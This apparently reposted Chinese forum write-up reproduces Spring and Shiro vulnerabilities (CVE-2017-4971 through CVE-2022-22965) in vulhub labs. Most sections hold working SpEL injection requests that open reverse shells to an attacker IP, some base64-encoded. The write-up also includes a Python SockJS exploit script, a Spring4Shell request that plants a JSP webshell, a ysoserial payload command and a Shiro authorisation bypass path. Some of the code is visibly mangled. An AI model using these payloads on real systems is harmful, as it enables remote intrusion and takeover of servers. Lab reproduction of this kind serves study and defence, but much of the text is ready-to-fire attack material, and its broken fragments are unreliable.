).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(125)))} 替换response_type值发包 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514785.png 反弹shell成功 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514781.png
Spring WebFlow远程代码实行(CVE-2017-4971)
Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成恣意命令实行。 影响版本 Spring WebFlow 2.4.0 - 2.4.4 http://192.168.48.133:8080/hotels/1 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514894.png 这里有默认的账号密码 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514911.png 登陆后 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514198.png 点击confirm抓包 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514440.png 漏洞触发点在这里 payload构造 &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.48.144/6665+0>%261")).start()=vulhub https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514352.png 反弹shell成功 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514390.png
Spring Data Rest 远程命令实行漏洞复现(CVE-2017-8046)
漏洞原理 Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来实行恣意Java代码 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514734.png payload 其中数字的构造 payload = b'touch /tmp/success' bytecode = ','.join(str(i) for i in list(payload)) print(bytecode)
PATCH/customers/1HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/json-patch+json Content-Length: 202
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]
反弹shell bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ4LjE0NC82NjY1IDA+JjE=}|{base64,-d}|{bash,-i} 98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,81,52,76,106,69,48,78,67,56,50,78,106,89,49,73,68,65,43,74,106,69,61,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125 记得修改Content-Type: application/json-patch+json https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514895.png 反弹shell成功 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514540.png
Spring CVE-2018-1270
影响版本 Spring Framework 5.0 to 5.0.4 Spring Framework 4.3 to 4.3.14 EXP利用
#!/usr/bin/env python3 import requests import random import string import time import threading import logging import sys import json
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
def random_str(length): letters = string.ascii_lowercase + string.digits return ''.join(random.choice(letters) for c in range(length))
class SockJS(threading.Thread): def init(self, url, args, **kwargs):super().init(args, *kwargs)self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'self.daemon = Trueself.session = requests.session()self.session.headers = {'Referer': url,'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'}self.t = int(time.time()1000)
def run(self):url = f'{self.base}/htmlfile?c=_jp.vulhub'response = self.session.get(url, stream=True)for line in response.iter_lines():time.sleep(0.5)
def send(self, command, headers, body=''):data =
data.append('\n'.join())
data.append('\n\n')data.append(body)data.append('\x00')data = json.dumps([''.join(data)])
response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)if response.status_code != 204:logging.info(f"send '{command}' data error.")else:logging.info(f"send '{command}' data success.")
def del(self):self.session.close()
sockjs = SockJS('http://你的靶机IP:8080/gs-guide-websocket') sockjs.start() time.sleep(1)
sockjs.send('connect', { 'accept-version': '1.1,1.0', 'heart-beat': '10000,10000' }) sockjs.send('subscribe', { 'selector': 'T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/bash","-c","exec 5/dev/tcp/你的kaliIP/kali监听端口;cat &5 >&5; done"})', 'id': 'sub-0', 'destination': '/topic/greetings' })
data = json.dumps({'name': 'vulhub'}) sockjs.send('send', { 'content-length': len(data), 'destination': '/app/hello' }, data)
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514231.png https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514990.png 反弹shell成功
Spring Data Commons RCE漏洞(CVE-2018-1273)
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以实行恣意命令 python3 SpringBoot-Scan.py -v "http://192.168.48.133:8080/" https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514073.png
POST /users?page=&size=5 HTTP/1.1 Host: 192.168.48.133:8080 Connection: keep-alive Content-Length: 129 Pragma: no-cache Cache-Control: no-cache Origin: http://192.168.48.133:8080 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8 Referer: http://192.168.48.133:8080/users?page=0&size=5 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch whoami.sh")]=&password=&123repeatedPassword=123
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514363.png python启动http.server python -m http.server 8888 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514927.png bash -i >& /dev/tcp/192.168.48.144/6665 0>&1 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081514802.png payload username#this.getClass().forName("java.lang.Runtime").getRuntime().exec('wget =&password=&123repeatedPassword=123]=&password=&123repeatedPassword=123) 这里bash反弹成功了 ./实行未成功 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515302.png https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515311.png
Spring Cloud Gateway远程代码实行漏洞(CVE-2022-22947)
漏洞说明 2022年3月1日,VMware官方发布漏洞报告,在利用Spring Colud Gateway的应用程序开启、袒露Gateway Actuator端点时,会容易造成代码注入攻击,攻击者可以制造恶意请求,在远程主机举行恣意远程实行。 影响版本
[*]Spring Cloud Gateway 3.1.x < 3.1.1
[*]Spring Cloud Gateway 3.0.x < 3.0.7
[*]旧的、不受支持的版本也会受到影响
python3 SpringBoot-Scan.py -v "http://192.168.48.133:8080/" https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515377.png https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515451.png
POST /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.48.133:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/json Content-Length: 310
{ "id": "hacktest", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"id"}).getInputStream()))}" } }], "uri": "http://example.com" }
发送如下数据包触发表达式实行 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515623.png
POST /actuator/gateway/refresh HTTP/1.1 Host: 192.168.48.133:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0
GET /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.48.133:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close
发送如上数据包查看效果 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515893.png
Spring Cloud Function SpEL RCE漏洞(CVE-2022-22963)
漏洞说明2022年3月,Spring Cloud 官方修复了一个 Spring Cloud Function中的 SPEL 表达式注入漏洞,由于 Spring Cloud Function中 RoutingFunction 类的 apply 方法将请求头中的 “spring.cloud.function.routing-expression” 参数作为SpEL表达式举行处理,造成了SpEL表达式注入漏洞,攻击者可利用该漏洞远程实行恣意代码。 漏洞利用 手工复现
POST /functionRouter HTTP/1.1 Host: 192.168.68.168:8080 Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ4LjE0NC82NjY1IDA+JjE=}|{base64,-d}|{bash,-i}") Content-Type: text/plain Content-Length: 6
Test
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515059.png
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515142.png
Spring Core RCE漏洞(CVE-2022-22965)
漏洞说明 Spring framework 是Spring 里面的一个基础开源框架,其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码实行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码实行 (RCE) 的攻击。 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515212.png /tomcatwar.jsp?pwd=aabysszg&cmd=whoami https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515342.png 手工复现 GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1 Host: 192.168.48.133:8080 Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71Safari/537.36 Connection: close suffix: %>// c1: Runtime c2: & /dev/tcp/192.168.48.144/6668 0>&1 YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ4LjE0NC82NjY4IDA+JjE= java -jar ysoserial-all.jar CommonsBeanutils1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ4LjE0NC82NjY4IDA+JjE=}|{base64,-d}|{bash,-i}" > poc.ser https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515300.png https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515452.png cookie修改发包 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515617.png 反弹shell成功 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515787.png
shiro-CVE-2020-1957
漏洞描述 利用 Apache Shiro 举行身份验证、权限控制时,可以经心构造恶意的URL,利用Apache Shiro 和 Spring Boot 对URL的处理的差别化,可以绕过Apache Shiro 对 Spring Boot 中的 Servlet的权限控制,越权并实现未授权访问。 漏洞影响版本
[*]Apache Shiro < 1.5.1
漏洞复现 payload /xxx/..;/admin/越权访问后台管理体系 https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515801.png
shiro baypasswaf
bypasswaf可参考如下文章 http://120.79.21.98:8090/archives/shirobypass
shiro有key无利用链子打法
面试遇见过的问题,除了问shiro反序列化漏洞原理偶然候也会问到这个点 其实还是有链子的,链子多的话,通过爆破利用链,完成漏洞利用。 环境搭建 docker pull medicean/vulapps:s_shiro_1 docker run -d -p 80:8080 medicean/vulapps:s_shiro_1
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515826.png
更多网安技能的在线实操训练,请点击这里>>
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]